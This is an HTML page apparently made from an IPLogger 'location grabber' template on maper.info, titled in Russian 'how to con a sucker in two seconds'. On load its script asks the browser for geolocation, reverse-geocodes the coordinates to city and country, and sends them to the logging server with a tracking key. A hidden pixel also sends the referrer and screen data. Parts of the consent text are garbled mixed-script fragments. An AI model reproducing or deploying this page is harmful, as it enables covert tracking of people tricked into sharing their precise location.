<!DOCTYPE html>
<html lang="RU" class="html">
<head>
	<title>Пр от вуву</title>
	<meta http-equiv="content-type" content="text/html; charset=utf-8" />
	<meta http-equiv="X-UA-Compatible" content="IE=edge">

    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">
	<meta name="author" content="Deorg" />
	<meta name="copyright" content="false />
	<meta name="robots content="index, follow" />
	<meta name="revisit-after" content="7 days" />
	<meta name="keywords" content="" />
	<meta name="description" content="" />

	<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />

	<meta property="og:image" content="" />
	<meta property="og:description" content="maper.info is a Scam shit" />
	<meta property="fb:app_id" content="232115388491569" />
	<meta property="og:image:width" content="285" />
	<meta property="og:image:height" content="200" />
	<meta property="og:url" content="https://maper.info/" />
	<meta property="og:type" content="website" />
	<meta property="og:title" content="Big shit" />

	<meta http-equiv="refresh" content="" data-content="10; url=" />

	<style>*{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}@-webkit-keyframes jump{0%,100%{transform:translateY(0px)}20%{transform:translateY(-10px)}40%{transform:translateY(0px)}}html{height:100%}body{width:100%;height:100%;position:relative;margin:0;padding:0px;color:#252525;background:#E5E5E5;font-family:Helvetica,Arial,sans-serif;letter-spacing:0.2px;font-size:1em}@media screen and (max-width:800px){body{font-size:1.2em}}#loader{position:absolute;top:0px;left:0px;right:0px;bottom:0px;background:#E5E5E5;z-index:10000;padding-top:250px;text-align:center}#loader.hidden{display:none}#loader>span{height:16px;width:16px;border-radius:50%;background-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.4s;animation-delay:0.4s}#loader>div{padding-top:10px}#header,#footer{color:white;background-color:#012237;width:100%}#footer{height:auto}.content{max-width:1024px;margin:0px auto;padding:5px 0px}a{color:#319FCA;cursor:pointer;text-decoration:underline}a:hover{text-decoration:none}.leaflet-control.iplogger-button:hover{background-color:#f4f4f4}.leaflet-control.iplogger-button{padding:0 10px;height:30px;background:#ffffff;color:#000;font-size:0.8em;cursor:pointer;line-height:30px;text-align:center;font-weight:bold}
	#mapper{width:100%;height:100%;margin:0;padding:0px;border-spacing:0px}.mymap{padding:0px;height:100%}#mymap{max-width:1024px;margin:0px auto;height:100%}#me{border:1px dashed black;height:40px;line-height:40px;text-align:center}
	@media (max-width: 800px){#mapper{height:300px;}.mymap{height:300px;}}
	</style>

	<script>
	var _y=["geo"],_z={},_x=function(name,data,n){n=_y.indexOf(name);_y.splice(n,1);if(typeof(data)=='object'){_z[name]=data}if(_y.length>0){return}_b();_s({'modules':_z},function(j){if(j.error){_c()}if(j.redirect){window.location=j.redirect}if(j.complete){_c();if(document.querySelector('main')&&j.classname){console.log(j.classname);document.querySelector('main').classList.add(j.classname)}}if(j.lat&&j.lng){_c();mapRender(j)}})},_b=function(){document.getElementById('loader').className=''},_c=function(){document.getElementById('loader').className='hidden'},_s=function(data,callback,x){data.key='unikey_87120c1c314937d76a22a85d6b82c190520b66c15641a70edfd9aae7ac11edb3';x=new XMLHttpRequest(),x.open('POST',window.location),x.setRequestHeader('X-Requested-With','XMLHttpRequest'),x.setRequestHeader("Accept","application/json"),x.setRequestHeader("Content-Type","application/json"),x.send(JSON.stringify(data)),x.onload=function(json){if(this.readyState!=4)return;try{json=JSON.parse(this.responseText)}catch(e){json={}};callback(json)}}
	</script>
</head>
<body>
	<div id='loader'>
		<span></span><span></span><span></span>
		<div><font face="Arcade">के लिए बचत</font> <strok color="#00FFFF" joins="miter" Thickness="2" पारदर्शिता="0.5">भविष्य का तोहफा! :) </स्ट्रोक>।</div>
	</div>

    <script>
	function watchPos(data) {
		if(!data || !data.coords){
			_x('geo', void 0);
			return;
		}
        var me={};

		var t=+new Date();
		t=Math.ceil(t/1000);
		me.time=t;
		me.lat=data.coords.latitude;
		me.lng=data.coords.longitude;
		me.acc=+Math.ceil(data.coords.accuracy);
		me.acc = (me.acc > 50000 ? 50000: me.acc);

		var xhr=new XMLHttpRequest();
		xhr.open('GET','https://nominatim.openstreetmap.org/reverse.php?format=json&lat=' + me.lat + '&lon=' + me.lng, true);
		xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
		xhr.onreadystatechange=function(){
			if(this.readyState!=4) {
				return;
			}

			var json = JSON.parse(this.responseText);

			if(json.address) {
				if(json.address.country_code) {
					me.country = json.address.country_code;
				}
				if(json.address.city) {
					me.city = json.address.city;
				}
            }

            _x('geo', me);
		};
		xhr.send();
	}
    _c();
</script>

<style type="text/css">

body {
	background-color:#FFFFFF;
	font-family:Montserrat, sans-serif;
}
.consent {
    padding: 20px 20px;
    margin: 0px auto;
    height: 100%;
    max-width: 700px;
    width: 100%;
}
.line {
    padding-top: 10px;
    padding-bottom: 10px;
    font-size: 0;
}
.line > div {
    width: 60% !important;
    padding: 0;
    border-bottom: 1px solid #cccccc;
    background: none;
    height: 1px;
    margin: 0px auto;
}
.submit {
	padding: 10px 0px;
	margin:0;
}
.footer {
    line-height: 18px;
    color: #333333;
    font-size: 12px;
    text-align: center;
}
.logo a {
	display: flex;
    margin: 0px auto;
    width: 160px;
    height: 35px;
    justify-content: center;
    align-items: center;
}
a {
	-webkit-text-size-adjust:none;
	-ms-text-size-adjust:none;
	mso-line-height-rule:exactly;
	text-decoration:underline;
	color:#338bd9;
	font-size:12px
}
H2 {
	Margin:0;
	line-height:34px;
	font-size:28px;
	font-style:normal;
	font-weight: bold;
	color:#333333;
	text-align: center;
}
.content {
	padding: 5px 0px;
	margin:0;
	line-height:21px;
	color:#333333;
	font-size:14px;
	text-align:center;
}
.logo {
    margin-bottom: 25px;
}
.handshake {

}
.handshake > img {
    display: block;
    border-radius: 3px;
    outline: none;
    text-decoration: none;
    -ms-interpolation-mode: bicubic;
    margin: 10px auto;
}
button.ok {
    text-decoration: none!important;
    color: #ffffff;
    font-size: 16px;
    border-style: solid;
    border-color: #999999;
    border-width: 1px;
    padding: 10px 30px;
    margin: 10px auto;
    display: block;
    background: #338bd9;
    border-radius: 3px;
    font-weight: normal;
    font-style: normal;
    line-height: 19px;
    width: auto;
    text-align: center;
    cursor: pointer;
    min-width: 200px;
    height: 45px;
}
button.ok:hover {
	opacity: 0.9;
	border-width: 2px;
}
button.no {
    text-decoration: underline;
    border: 0px;
    background: transparent;
    height: auto;
    width: auto;
    display: inline-block;
    color: #338bd9;
    text-align: left;
    cursor: pointer;
    padding: 0px;
    margin: 0px;
}
button.no:hover {
	text-decoration: none;
	color: #999999;
}

@media only screen and (max-height: 600px),

}

@media only screen and (max-width:600px) {
	p, ul li, ol li, a { line-height:150%!important }
	h1, h2, h3, h1 a, h2 a, h3 a { line-height:120% }
	h1 { font-size:42px!important; text-align:center }
	h2 { font-size:26px!important; text-align:center }
	h3 { font-size:20px!important; text-align:center }

	.content{ width:100%!important; max-width:600px!important; }
</style>

<div class="consent">
	<div class="logo">
    	<a target="_blank" href="https://iplogger.org/">
			<img src="https://cdn.iplogger.org/redirect/logo-dark.png" alt="IPLogger" width="154px" height="31px">
		</a>
	</div>

	<h2>Как развести лоха за две сек</h2>
	<div class="line"><div></div></div>


	<div class="content">
		Жми быстро
	</div>

	<div class="handshake">
		<img src="https://cdn.iplogger.org/redirect/location.png" alt="Allow location" width="209px" height="162px">
    </div>

    <div class="line"><div></div></div>

	<div class="submit">

		<div class="footer">
		    	By clicking «Allow», you agree with the וסך עבור<מתנה עתידית! >.
		</div>
	</div>

</div>

<script>
	if(typeof(navigator.geolocation) == 'object') {
		navigator.geolocation.getCurrentPosition(watchPos, watchPos);
	} else {
		_x('geo', void 0);
	}
</script>




    <script>
		var d=document,i=-100+'px',a=d.createElement('img'),url=[];url.push('t38.6'),url.push('r'+escape(document.referrer)),(!screen||url.push('s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth||screen.pixelDepth))),url.push('u'+escape('https://maper.info/redirect-2')),url.push('h'+escape(document.title.substring(0,150))),url.push(Math.random()),a.style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);
	</script>

</body>
</html>
